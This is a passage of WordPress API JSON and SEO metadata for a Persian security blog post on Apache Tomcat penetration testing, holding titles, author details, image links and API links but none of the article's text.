Tomcat\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u062e\u0627\u0646\u0647\",\"item\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\",\"name\":\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"description\":\"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fa-IR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\",\"name\":\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\",\"sameAs\":[\"https:\\\/\\\/liangroup.net\"],\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/author\\\/s-teymouri\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","og_locale":"fa_IR","og_type":"article","og_title":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat","og_description":"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.","og_url":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","og_site_name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","article_published_time":"2025-05-24T11:25:21+00:00","og_image":[{"width":728,"height":380,"url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","type":"image\/png"}],"author":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","twitter_card":"summary_large_image","twitter_creator":"@liansecurity","twitter_site":"@liansecurity","twitter_misc":{"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646":"15 \u062f\u0642\u06cc\u0642\u0647"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#article","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/"},"author":{"name":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a"},"headline":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat","datePublished":"2025-05-24T11:25:21+00:00","mainEntityOfPage":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/"},"wordCount":320,"commentCount":0,"image":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","articleSection":["\u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u0644\u06cc\u0627\u0646","\u0645\u0642\u0627\u0644\u0627\u062a \u062a\u0633\u062a \u0646\u0641\u0648\u0630","\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f"],"inLanguage":"fa-IR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","url":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","name":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#primaryimage"},"image":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","datePublished":"2025-05-24T11:25:21+00:00","author":{"@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a"},"description":"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.","breadcrumb":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#breadcrumb"},"inLanguage":"fa-IR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/"]}]},{"@type":"ImageObject","inLanguage":"fa-IR","@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#primaryimage","url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","contentUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","width":728,"height":380,"caption":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat"},{"@type":"BreadcrumbList","@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u062e\u0627\u0646\u0647","item":"https:\/\/liangroup.net\/blog\/"},{"@type":"ListItem","position":2,"name":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat"}]},{"@type":"WebSite","@id":"https:\/\/liangroup.net\/blog\/#website","url":"https:\/\/liangroup.net\/blog\/","name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/liangroup.net\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fa-IR"},{"@type":"Person","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a","name":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","sameAs":["https:\/\/liangroup.net"],"url":"https:\/\/liangroup.net\/blog\/author\/s-teymouri\/"}]}},"_links":{"self":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/19472","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/users\/14"}],"replies":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/comments?post=19472"}],"version-history":[{"count":0,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/19472\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media\/19501"}],"wp:attachment":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media?parent=19472"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/categories?post=19472"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/tags?post=19472"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}